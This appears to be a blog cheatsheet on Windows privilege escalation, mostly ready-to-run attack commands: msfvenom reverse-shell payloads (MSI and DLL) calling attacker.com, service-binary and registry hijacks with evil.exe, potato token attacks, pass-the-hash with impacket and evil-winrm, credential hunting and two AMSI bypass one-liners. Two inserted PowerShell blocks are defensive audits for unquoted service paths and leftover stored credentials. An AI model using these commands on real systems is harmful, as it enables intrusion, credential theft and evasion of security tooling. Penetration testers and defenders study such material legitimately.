
Windows Privilege Escalation

Dec 01, 2024
lawbyte

Windows privilege escalation covers a wide range of techniques from unquoted service paths to token impersonation. This cheatsheet covers the most reliable techniques with exact commands for each.

Automated Enumeration

# WinPEAS
.\winPEASx64.exe
.\winPEASx64.exe quiet # reduced output
.\winPEASx64.exe systeminfo # only system info

# PowerUp (PowerSploit)
Import-Module .\PowerUp.ps1
Invoke-AllChecks

# PrivescCheck
Import-Module .\PrivescCheck.ps1
Invoke-PrivescCheck

# SharpUp
.\SharpUp.exe

System Enumeration

# System info
systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
whoami /all # current user + groups + privileges
whoami /priv # privileges only
net user # list users
net localgroup administrators # admin group members
net user username # details on specific user

# Environment
set PATH
echo %USERNAME% %USERDOMAIN% %COMPUTERNAME%

# Running processes
tasklist /SVC # processes with services
Get-Process | Sort CPU -Descending

Service Misconfigurations

Weak service permissions

# Find services where non-admins have write permission
sc.exe qc <servicename>
accesschk.exe -uwcqv "Authenticated Users" * # Sysinternals
accesschk.exe /accepteula -uwcqv "Everyone" *

# If you have SERVICE_ALL_ACCESS or SERVICE_CHANGE_CONFIG:
sc.exe config <service> binpath= "cmd.exe /c whoami > C:\output.txt"
sc.exe stop <service>
sc.exe start <service>

Unquoted service paths

If a service binary path has spaces and isn’t quoted, Windows tries multiple paths:

Path: C:\Program Files\My App\service.exe

Windows tries:
C:\Program.exe
C:\Program Files\My.exe
C:\Program Files\My App\service.exe

# Find unquoted paths
wmic service get name,displayname,pathname,startmode | findstr /i "Auto" | findstr /i /v """" | findstr /i /v "C:\Windows"

# Or with PowerSploit
Get-ServiceUnquoted

# Exploit: place malicious executable at the first writable location
# e.g., C:\Program.exe or C:\Program Files\My.exe
copy C:\evil.exe "C:\Program Files\My.exe"
Restart-Service <servicename>
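An added audit script (not part of the original cheatsheet) that performs the candidate-path expansion shown above for every auto-start service, flags candidates whose parent directory grants write rights to a broad group, and prints the sc.exe command that quotes the path. The group list and the ACL mask are assumptions; the writability test is a heuristic, not a full effective-access calculation.

```powershell
# Added example, not code from the original post. Heuristic: a candidate path is
# "exposed" when its parent directory grants write rights to one of these groups.
$BroadGroups = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users')
$WriteMask   = 2 -bor 0x40000000 -bor 0x10000000   # FILE_WRITE_DATA | GENERIC_WRITE | GENERIC_ALL

function Get-UnquotedCandidates {
    # Reproduce the lookup for an unquoted image path: for every space in the
    # executable portion, "<prefix>.exe" is tried before the full path.
    param([string]$Exe)
    $parts = $Exe -split ' '
    for ($i = 1; $i -lt $parts.Count; $i++) {
        ($parts[0..($i - 1)] -join ' ') + '.exe'
    }
    $Exe
}

function Test-BroadWrite {
    param([string]$Directory)
    if (-not (Test-Path -LiteralPath $Directory -PathType Container)) { return $false }
    foreach ($ace in (Get-Acl -LiteralPath $Directory).Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($BroadGroups -notcontains $ace.IdentityReference.Value) { continue }
        if (([int]$ace.FileSystemRights -band $WriteMask) -ne 0) { return $true }
    }
    return $false
}

function Get-UnquotedServiceAudit {
    foreach ($svc in Get-CimInstance Win32_Service) {
        if ($svc.StartMode -ne 'Auto' -or -not $svc.PathName) { continue }
        if ($svc.PathName.StartsWith('"')) { continue }               # already quoted
        if (-not ($svc.PathName -match '^(.*?\.exe)')) { continue }   # isolate the executable
        $exe = $Matches[1]
        if ($exe -notmatch ' ' -or $exe -like '*\Windows\*') { continue }
        $args = $svc.PathName.Substring($exe.Length)
        $candidates = @(Get-UnquotedCandidates $exe)
        # The last candidate is the real binary; only the intermediate ones are hijack points
        foreach ($cand in $candidates[0..($candidates.Count - 2)]) {
            [pscustomobject]@{
                Service   = $svc.Name
                Candidate = $cand
                Exposed   = Test-BroadWrite (Split-Path -Parent $cand)
                Fix       = 'sc.exe config {0} binPath= "\"{1}\"{2}"' -f $svc.Name, $exe, $args
            }
        }
    }
}

Get-UnquotedServiceAudit | Format-Table -AutoSize
```

Run it from an elevated PowerShell on the host being audited; rows with Exposed = True are the ones to fix first, and applying the Fix column's command plus a service restart closes the gap.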

Writable service binary

# Check if the service binary itself is writable
accesschk.exe -quvw "C:\Program Files\Vulnerable\service.exe"
cacls "C:\Program Files\Vulnerable\service.exe"

# If writable, replace with malicious binary
copy /Y C:\evil.exe "C:\Program Files\Vulnerable\service.exe"
Restart-Service <servicename>

AlwaysInstallElevated

If both of these registry keys are set to 1, MSI files run with SYSTEM privileges:

# Check
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

# Exploit: create MSI payload
msfvenom -p windows/x64/shell_reverse_tcp LHOST=attacker.com LPORT=4444 -f msi -o evil.msi
msiexec /quiet /qn /i evil.msi

Insecure Registry Permissions

# Check registry key permissions for autorun entries
accesschk.exe -kvuqsw hklm\System\CurrentControlSet\services

# If writable, modify the ImagePath
reg add HKLM\SYSTEM\CurrentControlSet\Services\<SvcName> /v ImagePath /t REG_EXPAND_SZ /d "C:\evil.exe" /f

Scheduled Tasks

# List scheduled tasks
schtasks /query /fo LIST /v
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath

# Check if task binary is writable
schtasks /query /tn "TaskName" /fo LIST /v | findstr /C:"Task To Run"
accesschk.exe -quvw "C:\path\to\task\binary.exe"

# Also check if the folder containing the binary is writable
icacls "C:\path\to\task\"

Token Impersonation (Potato Attacks)

When you have SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege:

whoami /priv | findstr /i "impersonate assignprimarytoken"

Hot Potato / JuicyPotato (older Windows)

# JuicyPotato (Windows ≤ 2019)
JuicyPotato.exe -l 1337 -p C:\Windows\System32\cmd.exe -a "/c whoami > C:\out.txt" -t *

PrintSpoofer (Windows 10 / Server 2019)

PrintSpoofer.exe -i -c cmd
PrintSpoofer.exe -c "powershell -c whoami"

RoguePotato / GodPotato (newer systems)

GodPotato.exe -cmd "cmd /c whoami"
RoguePotato.exe -r attacker.com -e "cmd.exe /c whoami"

Meterpreter getsystem

meterpreter > getsystem
# Tries 3 techniques automatically

DLL Hijacking

Windows loads DLLs in this order:

  1. Known DLLs (HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs)
  2. Application directory
  3. System directory (C:\Windows\System32)
  4. PATH directories

# Find applications loading missing DLLs with Procmon filter:
# Process Name is target.exe
# Path ends with .dll
# Result is NAME NOT FOUND

# Check if application directory is writable
icacls "C:\Program Files\Target\"

# Create malicious DLL (DllMain runs with DLL_PROCESS_ATTACH as soon as the DLL is loaded)
# msfvenom
msfvenom -p windows/x64/shell_reverse_tcp LHOST=attacker.com LPORT=4444 -f dll -o missing.dll
copy missing.dll "C:\Program Files\Target\missing.dll"
Restart-Service TargetService

Stored Credentials

# Windows Credential Manager
cmdkey /list
runas /savecred /user:admin cmd.exe

# Registry: AutoLogon credentials
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

# Config files
findstr /si "password" *.txt *.xml *.config *.ini
dir /s /b *.config *.xml *.txt | findstr /i pass

# Unattend.xml / Sysprep
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\system32\sysprep\sysprep.xml
C:\Windows\system32\sysprep\unattend.xml

# MSSQL credentials
dir /s /b *.udl
reg query "HKLM\SOFTWARE\Microsoft\Microsoft SQL Server" /s
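As an added example (not from the original page), an audit that checks the Winlogon key and the unattend/sysprep files listed above and reports where a credential is present without echoing the secret itself. The file list is the one given on this page; the XPath matching on local-name() is an assumption about the unattend schema's default namespace.

```powershell
# Added example, not code from the original post: report leftover autologon and
# unattend/sysprep credentials without printing the secret values.
$UnattendFiles = @(
    'C:\Windows\Panther\Unattend.xml',
    'C:\Windows\Panther\Unattend\Unattend.xml',
    'C:\Windows\system32\sysprep\sysprep.xml',
    'C:\Windows\system32\sysprep\unattend.xml'
)

function Get-StoredCredentialAudit {
    # Winlogon: a DefaultPassword value means the autologon password is stored in clear
    $wl = Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
    if ($wl.PSObject.Properties['DefaultPassword']) {
        [pscustomobject]@{
            Source = 'Winlogon'
            Detail = "DefaultPassword set for $($wl.DefaultUserName); AutoAdminLogon=$($wl.AutoAdminLogon)"
        }
    }
    foreach ($file in $UnattendFiles) {
        if (-not (Test-Path -LiteralPath $file)) { continue }
        try { [xml]$doc = Get-Content -LiteralPath $file -Raw } catch { continue }
        # Unattend files use a default XML namespace, so match elements on local-name()
        foreach ($node in $doc.SelectNodes('//*[local-name()="Password"]')) {
            $plain = $node.SelectSingleNode('*[local-name()="PlainText"]')
            $plainText = if ($plain) { $plain.InnerText } else { 'unspecified' }
            [pscustomobject]@{
                Source = $file
                Detail = '{0}/Password (PlainText={1})' -f $node.ParentNode.LocalName, $plainText
            }
        }
    }
}

Get-StoredCredentialAudit | Format-Table -Wrap
```

Any row returned is material for cleanup: delete the DefaultPassword value (or use an LSA secret) and remove or sanitise the leftover unattend files.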

Pass the Hash

# With compromised NTLM hash
evil-winrm -i 192.168.1.100 -u Administrator -H "NTLM_HASH"
impacket-psexec Administrator@192.168.1.100 -hashes :NTLM_HASH
impacket-wmiexec Administrator@192.168.1.100 -hashes :NTLM_HASH
crackmapexec smb 192.168.1.100 -u Administrator -H NTLM_HASH

PowerShell AMSI Bypass

# Bypass AMSI before running tools
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)

# Or
$a='si';$b='Am';$Ref=[Ref].Assembly.GetType(('System.Management.Automation.'+$b+$a+'Utils'));
$z=$Ref.GetField(('am'+$a+'InitFailed'),'NonPublic,Static');$z.SetValue($null,$true)

Windows Privesc Checklist

  • whoami /priv — SeImpersonatePrivilege / SeDebugPrivilege
  • Unquoted service paths
  • Weak service binary permissions
  • AlwaysInstallElevated registry keys
  • Writable PATH directories
  • Scheduled tasks with writable binaries
  • DLL hijacking in writable directories
  • Stored credentials (cmdkey, registry, config files)
  • Autologon credentials in registry
  • AutoRun registry entries with writable paths
  • GPP credentials in SYSVOL
